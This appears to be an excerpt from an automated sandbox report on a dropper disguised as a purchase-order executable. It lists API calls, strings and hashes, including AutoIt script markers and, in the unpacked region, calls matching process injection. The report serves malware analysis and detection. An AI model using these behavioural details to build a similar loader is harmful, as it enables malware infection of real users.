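On a real dropper run scan_file() against the on-disk executable; a hit in signed_headers gives the offset at which the compiled script blob starts, which is the input for a script extractor. A region that the sandbox reports as "based on PE: false" (such as the 04000000 range later in this report) will not show these markers, because by then the payload has already been unpacked.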

                                  Control-flow Graph (function entry 00401100; graph rendering omitted)
                                  APIs
                                  • 742846C0.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                  • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                  • PostQuitMessage.USER32(00000000), ref: 004011CB
                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 004011F0
                                  • CreatePopupMenu.USER32 ref: 00401204
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Timer$742846ClipboardCreateFormatKillMenuMessagePopupPostQuitRegister
                                  • String ID: TaskbarCreated
                                  • API String ID: 3785120505-2362178303
                                  • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                  • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                  • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                  • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                  Control-flow Graph (function entry 004115D7; graph rendering omitted)
                                  APIs
                                  • _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • std::exception::exception.LIBCMT ref: 00411626
                                  • std::exception::exception.LIBCMT ref: 00411640
                                  • __CxxThrowException@8.LIBCMT ref: 00411651
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                  • String ID: ,*H$4*H$@fI
                                  • API String ID: 615853336-1459471987
                                  • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                  • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                  • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                  • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                  Control-flow Graph (function entry 04002670; graph rendering omitted)
                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04002741
                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04002967
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1475151647.0000000004000000.00000040.00000020.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4000000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CreateFileFreeVirtual
                                  • String ID:
                                  • API String ID: 204039940-0
                                  • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                  • Instruction ID: d0f91887d61f9e09956ddd325c10b4b005c835883c3c1b741659b71ad14d7274
                                  • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                  • Instruction Fuzzy Hash: B1A10874E01209EBEB14DFA4C898BEEB7B5BF48304F208199E505BB2C0D775AE85CB55

                                  Control-flow Graph (function entry 004102B0; graph rendering omitted)
                                  APIs
                                  • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                  • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                  • _wcsncpy.LIBCMT ref: 004102ED
                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                  • _wcsncpy.LIBCMT ref: 00410340
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                  • String ID: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe
                                  • API String ID: 3170942423-2073737659
                                  • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                  • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                  • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                  • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                                  Control-flow Graph (function entry 00401250; graph rendering omitted)
                                  APIs
                                    • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                    • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                    • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                  • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                  • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                  • String ID:
                                  • API String ID: 3300667738-0
                                  • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                  • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                  • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                  • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: QueryValue$CloseOpen
                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                  • API String ID: 1586453840-614718249
                                  • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                  • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                  • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                  • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                  APIs
                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                  • ShowWindow.USER32(?,00000000), ref: 004105E4
                                  • ShowWindow.USER32(?,00000000), ref: 004105EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$CreateShow
                                  • String ID: AutoIt v3$edit
                                  • API String ID: 1584632944-3779509399
                                  • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                  • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                  • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                  • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$ClearErrorLast
                                  • String ID: NULL Pointer assignment$Not an Object type
                                  • API String ID: 2487901850-572801152
                                  • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                  • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                  • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                  • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                  APIs
                                    • Part of subcall function 04002310: Sleep.KERNELBASE(000001F4), ref: 04002321
                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400255E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1475151647.0000000004000000.00000040.00000020.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4000000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CreateFileSleep
                                  • String ID: TTA0CXXHS5PXR6SG4S37XYASD4RUXY
                                  • API String ID: 2694422964-3187222419
                                  • Opcode ID: 0ef46986fa74fa09f499f018dc56d8a293bd0a83c87969e3aa18309c99d70689
                                  • Instruction ID: f3f023e50ea6455221ff1626207d85168f8ce6b1b5cb5c12bf651af4ac130df4
                                  • Opcode Fuzzy Hash: 0ef46986fa74fa09f499f018dc56d8a293bd0a83c87969e3aa18309c99d70689
                                  • Instruction Fuzzy Hash: 38617030D04288DAEF11DBF4C858BDEBBB89F15305F048199E6587B2C1C7B91B49CBA6
                                  APIs
                                  • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • _wcsncpy.LIBCMT ref: 00401C41
                                  • _wcscpy.LIBCMT ref: 00401C5D
                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                  • String ID: Line:
                                  • API String ID: 1874344091-1585850449
                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                  • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                  • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                  • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Close$OpenQueryValue
                                  • String ID: Control Panel\Mouse
                                  • API String ID: 1607946009-824357125
                                  APIs
                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 04001ACB
                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04001B61
                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04001B83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1475151647.0000000004000000.00000040.00000020.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4000000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                  • String ID:
                                  • API String ID: 2438371351-0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 0047950F
                                  • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                  • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                  • VariantClear.OLEAUT32(?), ref: 00479650
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$AllocClearCopyInitString
                                  • String ID:
                                  • API String ID: 2808897238-0
                                  APIs
                                    • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                  • _free.LIBCMT ref: 004295A0
                                    • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                    • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                    • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                    • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                    • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                    • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                  • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe
                                  • API String ID: 3938964917-666516263
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: Error:
                                  • API String ID: 4104443479-232661952
                                  APIs
                                  • 758ED0D0.COMDLG32(?), ref: 0042961B
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,0040F545,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,004A90E8,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,?,0040F545), ref: 0041013C
                                    • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                    • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                    • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                    • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Path$FullName_wcsncpy$DesktopFolderFromListMalloc
                                  • String ID: X$pWH
                                  • API String ID: 2653188779-941433119
                                  Strings
                                  • C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe, xrefs: 00410107
                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _strcat
                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe
                                  • API String ID: 1765576173-985769036
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                  • String ID:
                                  • API String ID: 1794320848-0
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                  • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Process$CurrentTerminate
                                  • String ID:
                                  • API String ID: 2429186680-0
                                  APIs
                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell_
                                  • String ID:
                                  • API String ID: 1144537725-0
                                  APIs
                                  • _malloc.LIBCMT ref: 0043214B
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • _malloc.LIBCMT ref: 0043215D
                                  • _malloc.LIBCMT ref: 0043216F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _malloc$AllocateHeap
                                  • String ID:
                                  • API String ID: 680241177-0
                                  APIs
                                  • TranslateMessage.USER32(?), ref: 00409556
                                  • DispatchMessageW.USER32(?), ref: 00409561
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Message$DispatchPeekTranslate
                                  • String ID:
                                  • API String ID: 4217535847-0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: ClearVariant
                                  • String ID:
                                  • API String ID: 1473721057-0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: _memmove
                                  • String ID:
                                  • API String ID: 4104443479-0
                                  APIs
                                    • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                    • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                    • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                  • _strcat.LIBCMT ref: 0040F786
                                    • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                    • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                  • String ID:
                                  • API String ID: 3199840319-0
                                  APIs
                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                  • FreeLibrary.KERNEL32(?), ref: 0040D78E
